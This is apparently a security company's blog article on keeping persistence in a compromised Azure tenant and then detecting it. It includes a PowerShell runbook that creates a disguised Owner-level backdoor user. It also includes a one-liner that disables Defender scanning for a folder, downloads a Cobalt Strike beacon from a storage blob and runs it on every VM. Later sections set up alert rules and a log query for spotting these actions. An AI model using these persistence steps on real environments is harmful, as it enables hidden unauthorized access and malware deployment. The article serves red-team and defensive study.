Azure Persistence and Detection

Azure.png

Cloud computing is one of the most impactful IT technological advancements in recent years due to perhaps its faster growth rate compared to other technologies in the ICT domain. Because of this, it is important to re-shape and adapt our “classic” penetration testing techniques to match the new demand in Cloud-based services.

In this article, we will be discussing a number of techniques for achieving persistence in Azure which are based on publicly available information and previous research that has been conducted in this area.

Moreover, we will also showcase how to detect and be alerted when said techniques are used by an attacker.

Azure Runbooks and Automation Accounts

The main prerequisite for successfully leveraging any of the techniques that will be showcased in this article, is for the attacker to have already compromised the target Azure environment and escalated their privileges to Global Admin or “Company Administrator” (Domain Admin equivalent for Azure environments).

How could an attacker retain persistence in an Azure environment even after the Blue Team has discovered their presence and kicked them out (e.g., after revoking Global Admin privileges or removing the compromised account altogether).

To achieve persistence, we will be leveraging the power of Azure Runbooks and Automation accounts with the goal of attaining two similar but slightly different objectives:

You can refer to previous research for a step-by-step process on how to prepare the environment but that could be summarised as follows:

Azure AD User Creation/Backdooring

Once everything is set up, we can then proceed with the creation of a new PS1 Azure Runbook for the newly created Automation Account.

In order for us to blend-in as much as possible with the target Azure environment, we have decided to mimic a Splunk/Azure integration based on official guides/How To from the vendors.

To that end, the following naming convention was adopted:

The actual runbook script consisted of a PowerShell Code that would create a new service principal with Owner privileges over the target subscription. Let’s try first to identify the script’s main “ingredients”:

Importing modules in a runbook (or any PS1 script) should be as easy as doing the following:

Import-Module Az.Accounts
Import-Module Az.Resources

According to this blog article, establishing the connection to the Azure environment should be easy as:

$connectionName = "AzureRunAsConnection"
$servicePrincipalConnection = Get-AutomationConnection -Name $connectionName
Connect-AzAccount -ServicePrincipal -TenantId $servicePrincipalConnection.TenantId -ApplicationId $servicePrincipalConnection.ApplicationId -CertificateThumbprint $servicePrincipalConnection.CertificateThumbprint

Please note that while the article mentions “Connect-AzureAD” we had to use AzAccount as that is what we imported in the PS1 script.

After establishing the connection to the AzureAD environment, we will need to:

According to Microsoft documentation, we can create a new user with the following PS code:

<# The password needs to be converted into the secure string type first #>
$SecureStringPassword = ConvertTo-SecureString -String "password" -AsPlainText -Force
New-AzADUser -DisplayName "MyDisplayName" -UserPrincipalName "myemail@domain.com" -Password $SecureStringPassword -MailNickname "MyMailNickName"

After creating a new user, the only thing left is to assign the Owner role to said user. Microsoft’s official documentation can help us with that:

New-AzRoleAssignment -SignInName john.doe@contoso.com -RoleDefinitionName Owner

Putting it all together:

<# Import the necessary AZ modules for user creation #>
Import-Module Az.Accounts
Import-Module Az.Resources
<# Establishing the connection to the Azure environment as an automation account. This is made possible by the AzureRunAsConnection feature. #>
$connectionName = "AzureRunAsConnection"
$servicePrincipalConnection = Get-AutomationConnection -Name $connectionName
Connect-AzAccount -ServicePrincipal -TenantId $servicePrincipalConnection.TenantId -ApplicationId $servicePrincipalConnection.ApplicationId -CertificateThumbprint $servicePrincipalConnection.CertificateThumbprint
<# The user’s password needs to be converted into the SecureString type in order to use it during the account creation step. #>
$Secure_String_Pwd = ConvertTo-SecureString <redacted> -AsPlainText -Force
<# Creation of a new user #>
New-AzADUser -DisplayName "splunk_svc" -UserPrincipalName "splunkdev@<redacted>" -Password $Secure_String_Pwd -MailNickname "SplunkDev"
<# Subscription Owner role assignment to the newly created user #>
New-AzRoleAssignment -SignInName $user -RoleDefinitionName Owner

Runbook script for adding a new Azure AD user with Owner permissions

After creating/publishing the runbook, we will need to create a webhook associated with the following procedure:

1.png

The following video showcases the successful execution of the AzureAutomationMonitor that resulted in the creation of the _splunksvc Azure AD user as a backdoor into the compromised cloud environment:

Azure VMs Persistence

In this section we will be showing how an attacker could abuse the runbook feature to effectively compromise Azure VMs in an almost automated fashion.

Although there are better and more effective ways of achieving Cloud to on-prem pivoting, being able to gain a shell on all Azure VMs could still be invaluable for an attacker especially if Active Domain Services are configured on an Azure VM (e.g. Domain Controller on an Azure VM).

To this end, the following steps were performed:

Add-MpPreference -ExclusionPath "C:\Programdata"; wget -O "C:\programdata\splunk-7.1.0-setup.exe" https://<storage_account>.blob.core.windows.net/splunkcontainer/indexes.conf; C:\programdata\splunk-7.1.0-setup.exe

The script is only a PoC and it is far from being OPSEC safe, so please take that into consideration when testing real Azure environments. To blend-in more we also named our payload as indexes.conf which is a common Splunk filename. The indexes.conf file was hosted on the same storage container with a policy that allowed the download of the file publicly:

2-2.png

To create a storage container and upload the payloads, you can follow these steps:

On the “Create storage account” page fill out the required fields (apart from the name you can leave the default values):

3.png

To make our life easier, we can select the Blob (anonymous read access for blobs only) access level although that is not recommended on live engagements unless you are okay with having your payloads potentially leaked:

4.png

Once our assets have been uploaded, we can then proceed with the creation of an Azure runbook that will execute our _splunkforwarder.ps1 script which will in turn download/execute our Cobalt Strike beacon (indexes.conf).

A publicly available script for executing PS1 on Azure VMs was slightly modified to serve our purposes:

5.png

* Once the script has been modified, we can then create the runbook by clicking on our automation account, then selecting “Runbooks” and finally clicking on “+ Create a runbook” in the top-left corner:

6.png

PS1 Script Execution Artifacts

The execution of PS1 scripts from an Azure Runbook usually creates the following artifacts:

7.png

8.png

The collection and monitoring of said artifacts may help in detecting and responding to a potential ongoing attack where an attacker with privileged access to the Azure VMs is trying to expand their reach within the Cloud estate.

Detection

When performing any of the aforementioned persistence techniques, an attacker will leave traces of their activities, and this can be invaluable for the Blue Team to help with early detection and response of security threats. Traces can be left by actions including but not limited to the following:

In this article, we will provide a demonstration on how to detect and receive alerts for the following events:

These examples could be easily applied to also capture events such as the creation of a new Automation Runbook for example.

Setting up the Alert Rules

Monitoring the subscription for any role change

To render the rule creation process easier, let us start by manually generating the event we would like to be alerted on, which in this case will be the monitoring of role changes withing the Azure subscription. By following this method, we can quickly create an alert rule based on a pre-existing event rather than creating it from scratch.

To do so, we can start by adding a user as the subscription Owner (or any other role) to trigger an event in the Audit Log:

We can then wait a few minutes and click on “Activity log”. That should display a new “Create role assignment” record as shown by the following screenshot:

9.png

At this point, we can create the rule by clicking on the “+ New alert rule” button:

Follow these steps to create the alert rule:

10.png

11.png

12.png

To test the alert rule: add a role assignment to a user and confirm an email alert is received.

If you receive something like the following, the alert should be working as expected:

13.png

At the end of the article, we will demonstrate a simple of automating the parsing of such emails so hang on tight until the end. Please note though that if you are serious about detection, you should not rely on email parsing as that is as that technique was used for PoC purposes only. The best option both in terms of security and scalability over time would be to “stream” all Azure related events to a SIEM solution. Although this may be covered in a future article, please do refer to Microsoft’s documentation for more information

Automation Account Creation Alerting

We can create an alert for detecting the creation of a new automation account in a very similar way:

GlobalAdmin Detection

We are going to use a slightly different approach for detecting if a new or existing user has been granted Global Admin privileges.

To summarise, we will need to:

Creating a workspace is as easy as going to Log Analytics workspace and clicking on “Create”. Once there, all you will need to do to create the workspace will be to assign it to a resource group and to give it a name which in our case was “AzureLoggingWorkspace”.

14.png

Once the workspace has been created, we can then proceed to configure Azure AD to forward the logs to our analytics workspace:

15.png

* Click on “Save” (and wait at least a good amount of time) for the changes to be applied.

Now for creating the actual email alert:

16.png

* Click on “Add condition” and select “Custom Log search”. * Input the following query as the “search query” and specify “0” as the Threshold value. Adjust the “Period (in minutes)” and “Frequency (in minutes)” to your liking. It is fine to leave the default 5 minutes value.

AuditLogs | where OperationName contains "Add member to role" and TargetResources contains "Company Administrator.

17.png

* Click on “Done”. * Assign an action group to the alert rule and finalise it by specifying a name for the rule.

Parsing the Alerts

Once the alerts have been correctly setup and we’ve confirmed that they are working we would still need to parse the received emails to understand the type of event that occurred in the Azure subscription.

As a PoC, we have developed a small python script to do just that. To summarise its function:

18.png

Refer to the below video for watching the tool in action:

Download: AzDetect.py

Conclusion

We have shown a few common techniques that attackers may use to achieve persistence within an Azure environment but also focused, towards the end of the article, on how to detect some of the key actions that a malicious actor may perform.

We wanted to show how you can start familiarising yourself with Azure’s built-in tools for security monitoring in order to detect the noisiest events that an attacker could generate.

Instead of relying on email parsing, scalable and robust monitoring and detection capabilities should be built around the following:

References

https://www.blackhillsinfosec.com/breaching-the-cloud-perimeter-w-beau-bullock/

https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/

http://saemundsson.se/?p=726

https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d

https://www.blackhillsinfosec.com/training/breaching-the-cloud-setup-instructions/breaching-the-cloud/

https://dirteam.com/sander/2020/07/22/howto-set-an-alert-to-notify-when-an-additional-person-is-assigned-the-azure-ad-global-administrator-role/

https://www.splunk.com/en_us/blog/platform/splunking-azure-event-hubs.htmll

https://gotoguy.blog/2018/07/11/using-the-azure-run-as-account-in-azure-automation-to-connect-to-azure-ad-with-a-service-principal/

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.1&viewFallbackFrom=powershell-6

https://docs.microsoft.com/en-us/powershell/module/az.resources/new-azroleassignment?view=azps-6.1.0

You may also be interested in...

imagensecforcepost.png
Oct. 10, 2011

CVE-2011-3368 PoC - Apache Proxy Scanner

ECFORCE has developed a proof of concept for this vulnerability. The script exploits the vulnerability and allows the user to retrieve arbitrary known files from the DMZ.

See more
imagensecforcepost.png
July 2, 2014

Reverse Engineer Router Firmware – Part 2

This part of the tutorial will focus on how to inspect all the different executables that you may find within the firmware using emulation software QEMU and then how to modify the firmware to get a root shell on the router.

See more